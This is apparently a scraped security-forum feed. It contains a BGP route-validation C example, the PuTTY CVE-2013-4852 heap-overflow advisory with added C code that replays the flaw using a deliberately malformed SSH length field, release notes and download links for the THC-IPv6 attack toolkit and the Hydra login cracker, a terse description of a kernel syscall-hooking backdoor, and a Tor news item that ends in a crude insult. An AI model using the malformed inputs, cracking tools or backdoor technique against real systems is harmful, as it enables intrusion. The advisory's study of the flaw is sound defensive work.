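            return ROUTE_VALID;
    }
    if (origin_ok)
        return ROUTE_TOO_SPECIFIC;
    return covered ? ROUTE_BAD_ORIGIN : ROUTE_UNKNOWN;
}

const char *route_status_name(enum route_status s)
{
    static const char *names[] = {"VALID", "UNKNOWN", "BAD_ORIGIN", "TOO_SPECIFIC", "MALFORMED"};
    return names[s];
}

int main(void)
{
    /* Constructed announcements mirroring the article's scenarios. */
    struct { const char *prefix; uint32_t origin_as; const char *what; } seen[] = {
        {"1.0.0.0/8",  64501, "ISP1 announcing its own block"},
        {"1.2.3.0/24", 64503, "ISP3 announcing a slice of ISP1's space"},
        {"1.2.3.0/24", 64501, "ISP1's own AS, but more specific than allowed"},
        {"3.0.0.0/8",  64503, "ISP3's block: nothing on file, accepted on trust"},
    };
    for (size_t i = 0; i < sizeof seen / sizeof seen[0]; i++)
        printf("%-12s AS%u -> %-12s (%s)\n", seen[i].prefix, (unsigned)seen[i].origin_as,
               route_status_name(check_announcement(seen[i].prefix, seen[i].origin_as)),
               seen[i].what);
    return 0;
}
```

The two "bad" outcomes map onto the two attack shapes the article describes: BAD_ORIGIN is the small ISP suddenly announcing someone else's space, and TOO_SPECIFIC is the more-specific announcement that wins over the legitimate aggregate even when it carries the right origin AS. UNKNOWN is deliberately not treated as a rejection, because a filter that dropped everything it had no record for would also drop every legitimately new allocation.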
-
PuTTY 0.62 Heap Overflow
Authored by Gergely Eberhardt

PuTTY versions 0.62 and below suffer from an SSH handshake heap overflow vulnerability.

PuTTY SSH handshake heap overflow (CVE-2013-4852)

Description: PuTTY versions 0.62 and earlier - as well as all software that integrates these versions of PuTTY - are vulnerable to an integer overflow leading to heap overflow during the SSH handshake before authentication, caused by improper bounds checking of the length parameter received from the SSH server. This allows remote attackers to cause denial of service, and may have more severe impact on the operation of software that uses PuTTY code.

Affected software products:
- PuTTY up to and including 0.62
- WinSCP before 5.1.6
- all other software that uses vulnerable (revision 9895 or earlier) PuTTY code

Details: A malformed size value in the SSH handshake could cause an integer overflow, as the getstring() function in sshrsa.c and sshdss.c read the handshake message length without checking that it was not a negative number. Specifically, the bignum_from_bytes() function invoked by getstring() received a data buffer along with its length represented by a signed integer (nbytes) and performed the following arithmetical operation before allocating memory to store the buffer:

    w = (nbytes + BIGNUM_INT_BYTES - 1) / BIGNUM_INT_BYTES; /* bytes->words */
    result = newbn(w);

If the value of nbytes was -1 (0xffffffff), the value of w would overflow to a very small positive number (depending on the value of BIGNUM_INT_BYTES), causing newbn() to reserve a very small memory area. Then a large number of bytes would be copied into the data buffer afterwards, resulting in a heap overflow. Similarly, if nbytes was chosen so that w would be -1, the newbn() function would allocate zero bytes in memory via snewn() and attempt to write the size of the Bignum (in four bytes) into the allocated zero-byte area, also resulting in a heap overflow.

Consequences: In the standalone PuTTY client the attacker does not have precise control over the memory corruption, so this bug can only cause a local denial-of-service (crash). However, in other software that uses PuTTY code, such heap corruption could have more severe effects. Specifically in case of WinSCP, this vulnerability could potentially lead to code execution due to the exception handling employed by the program.

Solution: This vulnerability has been fixed in the development version of PuTTY [2]. All developers using PuTTY code are recommended to use revision 9896 or later. The potential code execution vulnerability has been addressed in WinSCP 5.1.6 [3].

Credits: This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu)

References:
[1] http://www.search-lab.hu/advisories/secadv-20130722
[2] http://svn.tartarus.org/sgt?view=revision&sortby=date&revision=9896
[3] http://winscp.net/tracker/show_bug.cgi?id=1017

Source: PuTTY 0.62 Heap Overflow ≈ Packet Storm
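An added example, not code from the advisory or from PuTTY itself, that replays the arithmetic the advisory quotes so the two failure modes can be seen with concrete numbers, and puts the hardened checks next to it. It assumes a 32-bit bignum word (BIGNUM_INT_BYTES = 4; PuTTY picks the word size per platform, which is why the advisory says the result depends on it) and models newbn() as allocating w + 1 words, which is consistent with the advisory's statement that w == -1 turns into a zero-byte allocation. The two SSH "string" encodings at the bottom are constructed inputs.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumption: a 32-bit bignum word, so BIGNUM_INT_BYTES is 4. */
typedef uint32_t BignumInt;
#define BIGNUM_INT_BYTES ((int)sizeof(BignumInt))

/* The arithmetic quoted in the advisory: nbytes is a signed int and is never
   checked, so a negative value passes straight into the rounding division. */
int words_for_bytes_unchecked(int nbytes)
{
    return (nbytes + BIGNUM_INT_BYTES - 1) / BIGNUM_INT_BYTES; /* bytes->words */
}

/* Bytes a newbn()-style allocation of (w + 1) words would request.
   Assumption (see lead-in): newbn() allocates w + 1 words, so w == -1 asks
   for zero bytes and the subsequent write of the length lands outside it. */
size_t alloc_bytes_for_words(int w)
{
    return (size_t)(w + 1) * sizeof(BignumInt);
}

/* Hardened counterpart: reject negative lengths, and lengths so large that the
   rounding addition itself would overflow, before doing any arithmetic.
   Returns the word count, or -1 if the length is unacceptable. */
int words_for_bytes_checked(int nbytes)
{
    if (nbytes < 0 || nbytes > INT_MAX - (BIGNUM_INT_BYTES - 1))
        return -1;
    return (nbytes + BIGNUM_INT_BYTES - 1) / BIGNUM_INT_BYTES;
}

/* Constructed SSH "string" encodings (uint32 big-endian length + bytes): a
   well-formed 3-byte string, and a header claiming 0xffffffff bytes (the -1
   case from the advisory) while only one byte actually follows. */
static const unsigned char good_string[] = {0x00, 0x00, 0x00, 0x03, 'a', 'b', 'c'};
static const unsigned char bad_string[]  = {0xff, 0xff, 0xff, 0xff, 'a'};

/* Where the length belongs being validated: against the bytes actually
   received. Returns the payload length, or -1 if the field claims more than
   is present in the buffer. */
long ssh_string_payload_len(const unsigned char *buf, size_t buflen)
{
    if (buflen < 4)
        return -1;
    uint32_t len = ((uint32_t)buf[0] << 24) | ((uint32_t)buf[1] << 16) |
                   ((uint32_t)buf[2] << 8)  |  (uint32_t)buf[3];
    if (len > buflen - 4)
        return -1;
    return (long)len;
}

int main(void)
{
    /* -1 gives w == 0 (a 4-byte area for a 0xffffffff-byte copy); -8 gives
       w == -1 (a zero-byte area); 5 is an honest length. */
    int samples[] = {-1, -8, 5};
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int w = words_for_bytes_unchecked(samples[i]);
        printf("nbytes=%d: unchecked w=%d (alloc %zu bytes), checked=%d\n",
               samples[i], w, alloc_bytes_for_words(w), words_for_bytes_checked(samples[i]));
    }
    printf("good string payload: %ld, bad string payload: %ld\n",
           ssh_string_payload_len(good_string, sizeof good_string),
           ssh_string_payload_len(bad_string, sizeof bad_string));
    return 0;
}
```

The unchecked function reproduces both outcomes described in the advisory: a negative nbytes of -1 rounds to w = 0 while the later copy would still use the huge unsigned length, and a value such as -8 rounds to w = -1, for which the modelled allocation size is zero. The fix has two layers: the length field is checked against the bytes actually received as soon as it is parsed, and the word-count arithmetic refuses negative or near-INT_MAX inputs rather than relying on the caller.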
-
THC-IPv6 Attack Tool 2.3
Authored by van Hauser, thc | Site thc.org

THC-IPV6 is a toolkit that attacks the inherent protocol weaknesses of IPv6 and ICMP6 and it includes an easy to use packet factory library.

Changes: 2 new tools added as well as 2 new scripts. Various updates to existing tools.

Download: http://packetstormsecurity.com/files/download/122685/thc-ipv6-2.3.tar.gz

Source: THC-IPv6 Attack Tool 2.3 ≈ Packet Storm
-
Hydra Network Logon Cracker 7.5
Authored by van Hauser, thc | Site thc.org

THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus.

Changes: Moved the license from GPLv3 to AGPLv3. Added module for Asterisk Call Manager. Added support for Android where some functions are not available. Various other updates.

Download: http://packetstormsecurity.com/files/download/122684/hydra-7.5.tar.gz

Source: Hydra Network Logon Cracker 7.5 ≈ Packet Storm
-
Netsniff-NG High Performance Sniffer 0.5.8 RC2
Authored by Tobias Klauser, Daniel Borkmann | Site code.google.com

netsniff-ng is a free, performant Linux network sniffer for packet inspection. The gain of performance is reached by 'zero-copy' mechanisms, so that the kernel does not need to copy packets from kernelspace to userspace. For this purpose netsniff-ng is libpcap independent, but nevertheless supports the pcap file format for capturing, replaying and performing offline-analysis of pcap dumps. netsniff-ng can be used for protocol analysis, reverse engineering and network debugging.

Changes: Build system fixes and clean ups. Mausezahn man pages improvements. Compiler warnings fixed. Support for replaying/reading pcap capture files from/to tunnel devices.

Download: http://packetstormsecurity.com/files/download/122652/netsniff-ng-0.5.8-rc2.tar.gz

Source: Netsniff-NG High Performance Sniffer 0.5.8 RC2 ≈ Packet Storm
-
(Syscall IDP Engine). Captures all system services (KDR, hidden). Returns control on a specified address (int 0x2e/sysenter -> PEB.Filter()). By calling the backdoor, control is returned to the kernel (Filter() -> backdoor() -> nt service dispatcher). o X86, KM, MI, KDR. o One may choose SST[0]: SST[0] for gui-thread, SST[1] for shadow. Vid: Video2.avi — RGhost. Org: VX Forum SIDE.zip. Source: SIDE.
-
The idea is simple. Suppose you write a function RST() that you call in main():

    int main() {
        RST();
    }

    void RST() {
        // Something
    }

This code will give you an error because, inside main, the function RST is NOT known, since it hasn't been declared yet (in short, because it is defined BELOW the main function). What you can do, however, is declare the PROTOTYPE of the RST function above main, followed by ";". That is:

    void RST();

    int main() {
        RST();
    }

    void RST() {
        // Something
    }

Now the compiler knows that you have a function RST, with no parameters, of type "void". That's the idea.
-
Step into the BREACH: HTTPS encrypted web cracked in 30 seconds
Nytro replied to Matt's topic in Stiri securitate
Useful paper: http://www.iacr.org/cryptodb/archive/2002/FSE/3091/3091.pdf -
The imgur ones work for me. Don't they show up for you? Try a Clear Cache or something.
-
Yes, meaning you post shitty links to HTML pages that CONTAIN some crappy image. Post a direct link to the image if you want it to work. Thanks for understanding.
-
Something like this was tried in the past; many boasted that they wanted to learn, that they wanted to participate, and we ended up with about 10 guys on the chat (there was a chat where things were discussed and explained), 6-7 of whom weren't even at the computer.
-
Half of the sites on the TOR network compromised. Freedom Hosting founder arrested
by Redactia Hit | 5 August 2013

This weekend the FBI launched a large-scale operation aimed at identifying and capturing providers of illegal online material involving child pornography. Significant arrests have already taken place. According to a post on TwittLonger, more than half of the sites running through the Tor network have been compromised, and the same has happened to the email addresses on TORmail, considered the most secure email service.

As part of the US authorities' operation, Eric Eoin Marques, founder of Freedom Hosting, which also serves the TORmail servers, was arrested in Ireland and charged with supplying and promoting pornographic material involving minors. The FBI describes Eric Eoin Marques as "the largest promoter of such material in the world", and the US authorities have requested his extradition.

On Saturday morning, at the same time as news of Eric Eoin Marques's arrest spread, all sites hosted by FH were taken down, according to DailyDot.com, and most of those that came back online a little later were compromised using a vulnerability that allows access to cookies, logins and IP addresses. Interestingly, this outage of many sites operating through TOR and of the TORmail services occurred during the DEFCON hacking conference, held between 1 and 4 August.

It should be noted that TOR is not a network to be confused with an exclusive tool of online criminals. TOR is used by all those who hoped the network could ensure the confidentiality of their personal data and online communications, and it has enjoyed success especially in the context of the increasingly direct intrusion of authorities into individuals' private lives. In the past five years, authorities and various hacker organizations have tried to break the network's security, but only now has this been achieved.

Freedom Hosting is the most popular web hosting service on the TOR network, but also probably the most controversial because of its links to illegal sites such as Lolita City, the Love Zone or PedoEmpire. At this moment, many sites hosted by Freedom Hosting are down or reported as infected. The shutdown of the most important child pornography sites is the authorities' first concrete, large-scale victory against online criminals. For now, however, it cannot be said who was behind the attack on Freedom Hosting, nor what the attack method was. According to information circulating on the internet, the "raid" by the FBI and by the hackers supporting the authorities' action will continue for at least another two weeks. We will return with details.

Sources: The Daily Dot, Irish Independent

Since your balls would fall off if you read the news in English, here's a Romanian version. Fuck you.

Source: Half of the sites on the TOR network compromised. Freedom Hosting founder arrested | Hit.ro